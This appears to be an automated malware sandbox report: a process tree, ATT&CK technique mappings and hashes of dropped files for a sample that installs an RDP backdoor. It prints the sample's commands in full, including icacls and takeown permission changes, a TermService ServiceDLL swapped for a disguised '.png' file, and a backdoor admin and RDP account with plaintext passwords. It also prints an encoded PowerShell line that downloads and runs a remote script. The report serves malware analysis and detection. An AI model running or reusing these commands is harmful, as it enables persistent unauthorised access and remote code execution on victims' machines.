        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4444
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uvuhnshi\uvuhnshi.cmdline"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:2944
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4428.tmp" "c:\Users\Admin\AppData\Local\Temp\uvuhnshi\CSC4A18CD865224F1FB46E17F9F0C9E9E6.TMP"
        9⤵
        
        PID:3708
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1772
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:540
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2064
        
        C:\Windows\system32\takeown.exe
        
        "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4460
        
        C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4700
        
        C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:4344
        
        C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1708
        
        C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1656
        
        C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3384
        
        C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1976
        
        C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5100
        
        C:\Windows\system32\reg.exe
        
        "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
        8⤵
        
        PID:2540
        
        C:\Windows\system32\reg.exe
        
        "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        8⤵
        Server Software Component: Terminal Services DLL
        Modifies registry key
        
        PID:3428
        
        C:\Windows\system32\reg.exe
        
        "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
        8⤵
        
        PID:960
        
        C:\Windows\system32\net.exe
        
        "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:2388
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        9⤵
        
        PID:456
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:4556
        
        C:\Windows\system32\cmd.exe
        
        cmd /c net start rdpdr
        9⤵
        Suspicious use of WriteProcessMemory
        
        PID:4132
        
        C:\Windows\system32\net.exe
        
        net start rdpdr
        10⤵
        
        PID:4304
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        11⤵
        
        PID:2492
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
        8⤵
        
        PID:928
        
        C:\Windows\system32\cmd.exe
        
        cmd /c net start TermService
        9⤵
        
        PID:3936
        
        C:\Windows\system32\net.exe
        
        net start TermService
        10⤵
        
        PID:1092
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        11⤵
        
        PID:2172
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
        8⤵
        
        PID:3628
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
        8⤵
        
        PID:4740
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1 -n 30
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2460

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
- Indicator Removal: Network Share Connection Removal
PID:3080
- C:\Windows\system32\net.exe
  net.exe user wgautilacc Ghar4f5 /del
  2⤵
  - Indicator Removal: Network Share Connection Removal
  PID:5000
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
    3⤵
    - Indicator Removal: Network Share Connection Removal
    PID:4196

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc 26xZktBi /add
1⤵
PID:4576
- C:\Windows\system32\net.exe
  net.exe user wgautilacc 26xZktBi /add
  2⤵
  PID:1876
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc 26xZktBi /add
    3⤵
    PID:5080

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:2612
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  2⤵
  - Remote Service Session Hijacking: RDP Hijacking
  PID:4560
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:1192

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" OARDHGDN$ /ADD
1⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:3872
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" OARDHGDN$ /ADD
  2⤵
  - Remote Service Session Hijacking: RDP Hijacking
  PID:3920
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" OARDHGDN$ /ADD
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:3116

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
PID:452
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  2⤵
  PID:924
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
    3⤵
    PID:3768

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc 26xZktBi
1⤵
PID:396
- C:\Windows\system32\net.exe
  net.exe user wgautilacc 26xZktBi
  2⤵
  PID:3096
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc 26xZktBi
    3⤵
    PID:2964

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:4272
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:5028

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:3492
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3332

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2460
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:2300
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Command and Scripting Interpreter: PowerShell
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1976

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Account Manipulation

T1098

Defense Evasion

File and Directory Permissions Modification

T1222

Indicator Removal

T1070

File Deletion

T1070.004

Network Share Connection Removal

T1070.005

Modify Registry

T1112

Credential Access

Discovery

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Guardatelo.tif

Filesize
6.0MB

MD5
781b1a967dbdc2aecf3ca4bf35ee91f0

SHA1
4eeb1e4b9c2a187d26aa182bcd29749339a2ed9c

SHA256
e3ef8d5641a303ccd7b0ec22bdb8f1bf4293aeb8e5e3c2c4a8da6521b41c754b

SHA512
677c09cb87b99ec0848cbbed7f579cf326377db0e271a61ed1bc7972efa0c3b9c55cbecaed564b56a55f0185c5bf6ec69d9b8652fb88d0f73899a9d31c0e8634

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Ridere.exe.com

Filesize
1.0MB

MD5
f83ab141e29899ceb5308dabde894a0e

SHA1
6ea46bb7102125fa5d39b77547dab28ec346e9f9

SHA256
ce2fb05b7d6e31db76127521aac02d9b3d595058ba13687c4ad6c68088eb8d99

SHA512
d79ccd447e15899efbc68e351d2500efc8ad6c106eb76565105e5eec3ace6a02435d6569d23efc65527d00c878eb22f4afabfdca440d9b573548e18fdea72847

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Rimanete.tif

Filesize
463B

MD5
944eb6ec2b54658c347fae484653c95c

SHA1
dd75d4481f1f650556903ae11bd83b5bab125c94

SHA256
957495369445d1d6a0451a2fcf054ad420dfdcabb1cd2582da38ce05297ee1ed

SHA512
3674d697b1e1e1ceeb1abf1ac9c9765984e15cd47bd156268465230ef9b3898487296b2eabf3676b916ca4cf5b2a65ad3914becc02ab9bb40002db4b93a09935

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Rossore.tif

Filesize
940KB

MD5
bdc3a83f50b7f876bef34e709c6658d9

SHA1
e655e8feeb364927edc8223adf18149743496c03

SHA256
7772aa3829f08ff502e203a681c22d83f2c9feca6cd466a709795daffbf47e37

SHA512
4725dd51841eea4fce09b603e1cd9ccd7e370dac8cc88c0def6909b791cc04dfd8a5ca83939d910b40012c4bfde0c40c522f22aecb61893da5c8e7fbe62666e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vedevo.tif

Filesize
1.0MB

MD5
48f2a2475baace65ab8fd6259ec101ed

SHA1
af695e8ec4aec796eeab78a635935c433e8a9265

SHA256
bcafb09b6a3096a5ad07987344b837c5050a285e05af1446bf83f8ea7c5edff4

SHA512
16ef5fe57b430d7f67c2cd43f6cb1991d84f3b083a7618d77f0ab1cc1735f2982c7ade7ef79677c1d0884f54cc2c69ee7564432998266bec4b7f295e9a4e3004

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES4428.tmp

Filesize
1KB

MD5
aedc82afc80f2eeb21ca85931e4078c2

SHA1
b34d788c73d378b99028d5a0b81a64dc127dd444

SHA256
d04ee3771d3d52a371c55c619791505a9eb7874a73afaa3336b119a660be1386

SHA512
d2e5fceca4e8f7b033d7bbffe9a855fd16793b01525a5a4e664feee8086f5b44ea6317ccb6346e04bd3ab08aea0c2b760a043df05e1ac9a9c79e23262a29cdcc

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_140a2lwi.0v1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

Filesize
2.5MB

MD5
213fdd5024c816a8d22dc7c860a850ad

SHA1
9ed04e6f30e6c1a1d8c1dea7b216541c2bec674d

SHA256
786ab83aa960b0d85e8ef620a176ae358700bbb1060bc7c261a1de7ebc524cb3

SHA512
bcb938661f4e1c37c886ff513576cd3eabe1336f957565f43211760e1970473061559bf21e1b736e260f36fe9ee7c33a06bd6ca00944c9051003a55377e7c0e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\uvuhnshi\uvuhnshi.dll

Filesize
3KB

MD5
35860bad8088983cec425948c9cd66ab

SHA1
60ef15d8e3cd203de66e3bccb11118b3b85bd8f9

SHA256
4f1eec4f66a38c7bec466928664c68ca5c5582489821b1402444f2bea694f726

SHA512
e5b6d5274fddd52cc0c8fe3cf0c9c2c67342bc452179abb0b6aaa87029c6f287c68ea42b855bb350514d2f774d4795ec03ac8f00232a568510d5dad6618e5364

Download Submit
C:\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
2b5fbe9cdc001b5392071201f67373c0

SHA1
e3a000fa384e3ecfe2e999c6d1ddfbbfe91b24bc

SHA256
5840c4dc2d881bc79dcd4c5cb870d59475451b5a54af3b9dc66f18a03cc59812

SHA512
35fb2d86d902472b24f2593ec4a74f73d0f1b95becdc8b7f3c118ff8685ca20d56732aec2158e782c2c39b10ab66d0863ff6cbbfeeccfe93c3d732e87a2c696c

Download Submit
C:\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
ac538603c13cf29bfbe122afc05431b7

SHA1
b0dbd1ec47b343a2caf1c533e3fa5d991134273b

SHA256
b7ed879e2bf45385fda562fee8a4d57e5db77dcbb21952fde8b1955e1bc6b03d

SHA512
4cb57a76d07ea519819744783aa7e584e471d2d6ca7dc97752ef267642ec3e6725837598e7aca488252bf7b00d4fe41816b04d9f69d26c044b5df6c37ecf26d6

Download Submit
C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI67DD.tmp

Filesize
24KB

MD5
d0e162c0bd0629323ebb1ed88df890d6

SHA1
cf3fd2652cdb6ff86d1df215977454390ed4d7bc

SHA256
3e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744

SHA512
a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\lsarpc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uvuhnshi\CSC4A18CD865224F1FB46E17F9F0C9E9E6.TMP

Filesize
652B

MD5
67f79ec2d4ecfec241ae8b39234715a6

SHA1
1a12264f1d9b4bcbc5e4b23f225d2ed71a203f14

SHA256
1df73a014fca4241bf06099c19c5b85233d6e5739be2982fc85dde2c0ab112a2

SHA512
3204fca05969ffe73aae64287e4c4f3b48d0613458b595e57703da412220f59c2f6d0f957afff72e42d18906ecab5e8aaaf9defc3ded16f4c43c5bcac05dc7a8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uvuhnshi\uvuhnshi.0.cs

Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uvuhnshi\uvuhnshi.cmdline

Filesize
369B

MD5
643b2ab60a32e8cccdce7dd7c9402ca4

SHA1
227b4d325d8256e8b2e606ad60cf29f62a8033e8

SHA256
2c6431aafbeeb4cc1b58fade938cbefdc60182e5d4f2f6bc4c66503a7c81c6d4

SHA512
428de7fe38aaefc98100ad2dfb8d20ed7490b56d2423f75af302665414ad4e7cb9ca9b3a4c0346fb1559e1ff4675b7276313a46f6d3759ff6b91b13295d0b0db

Download Submit
memory/892-31-0x0000023AC1B10000-0x0000023AC1F36000-memory.dmp

Filesize
4.1MB

Download
memory/892-26-0x0000023A814E0000-0x0000023A81B38000-memory.dmp

Filesize
6.3MB

Download
memory/892-28-0x0000023A814E0000-0x0000023A81B38000-memory.dmp

Filesize
6.3MB

Download
memory/892-23-0x0000023A814E0000-0x0000023A81B38000-memory.dmp

Filesize
6.3MB

Download
memory/892-27-0x0000023A814E0000-0x0000023A81B38000-memory.dmp

Filesize
6.3MB

Download
memory/892-29-0x0000023A814E0000-0x0000023A81B38000-memory.dmp

Filesize
6.3MB

Download
memory/892-30-0x0000023A814E0000-0x0000023A81B38000-memory.dmp

Filesize
6.3MB

Download
memory/892-154-0x0000023A814E0000-0x0000023A81B38000-memory.dmp

Filesize
6.3MB

Download
memory/4444-57-0x000002B2F3740000-0x000002B2F3748000-memory.dmp

Filesize
32KB

Download
memory/4444-60-0x000002B2F3F50000-0x000002B2F40C6000-memory.dmp

Filesize
1.5MB

Download
memory/4444-61-0x000002B2F42E0000-0x000002B2F44EA000-memory.dmp

Filesize
2.0MB

Download
memory/4444-34-0x000002B2F3710000-0x000002B2F3732000-memory.dmp

Filesize
136KB

Download